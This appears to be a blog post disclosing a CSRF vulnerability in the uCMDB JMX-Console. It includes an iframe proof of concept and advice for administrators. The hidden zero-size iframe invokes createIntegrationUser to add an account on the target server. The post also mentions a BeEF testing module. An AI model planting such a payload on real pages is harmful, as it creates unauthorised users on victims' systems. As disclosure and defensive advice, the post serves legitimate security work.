The product contains a JMX-Console that exposes direct access to the Managed Beans (MBeans). This JMX-Console that is a standard part of any uCMDB configuration is vulnerable to CSRF. I reported this since additional users can be created via this JMX-Console, even integration users. Also a lot of other functionality is accessible via this JMX-Console.
After sending them 8 e-mails, with references to their deployment guides and release notes they still ignore the problem and their conclusion is that it's due to an installation of JBoss-server on the uCMDB system. I have no other choice then to warn uCMDB system administrators.
PoC
You can easily verify it with an iframe:
<iframe src="http://ucmdbhostname:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=createIntegrationUser&arg0=1&arg1=testaa&arg2=testbb&arg3="
width="0" height="0" ></iframe>
BeEF Module
A module for testing is available at BeEF project.
Advise
Finally, my advise towards uCMDB-administrators is to be extra careful when using the JMX-console. Make sure sessions are expired/invalidated before accessing other webpages.
PS: I think uCMDB 10.x is also vulnerable...
BeantwoordenVerwijderen